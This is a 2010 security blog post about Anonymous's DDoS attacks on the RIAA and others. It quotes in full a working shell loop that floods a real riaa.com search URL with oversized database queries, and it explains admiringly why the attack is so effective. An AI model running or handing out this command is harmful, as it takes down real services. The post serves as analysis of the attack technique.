Keeping Up With the DDoS Kids

Posted September 29th, 2010 by

So last week Anonymous staged a Distributed Denial of Service against the RIAA, MPAA, and Aiplex over Aiplex’s announcement that they were launching DDoS attacks of their own against torrent sites sharing copyrighted content.  In doing a bit of research on techniques that were being used, I came across this wonderful bit of script:

while true; do wget ‘http://riaa.com/goldandplatinumdata.php?table=SEARCH_RESULTS&title=&artist=&label=&format=&category=&type=&awardDescription=&startMonth=1&startYear=0&endMonth=12&endYear=2009&sort=Date&sense=ASC&perPage=5000000000&go=Search’ > /dev/null &  done

For those of you who don’t get it just yet, this is an awesome attack to study.  Basically what it does is to run an endless loop grabbing a search page url with parameters that will do a huge database query.  The beauty of the attack is that it’s “highly leveraged”: for one http get, you generate a sizeable amount of database load.  Now multiply that by thousands of yahoos out there running the same script, and it will rollover the target’s database server and possibly the applications servers that query it.



Similar Posts:

Posted in Hack the Planet, Technical | 1 Comment »
Tags:

One Response

  1.  Tweets that mention Keeping Up With the DDoS Kids | The Guerilla CISO -- Topsy.com Says:

    […] This post was mentioned on Twitter by novainfosec, alex knorr. alex knorr said: Keeping Up With the DDoS Kids: So last week Anonymous staged a Distributed Denial of Service against the RIAA, MPA… http://bit.ly/beChQn […]

Leave a Comment

Please note: Comment moderation is enabled and may delay your comment. There is no need to resubmit your comment.


Visitor Geolocationing Widget: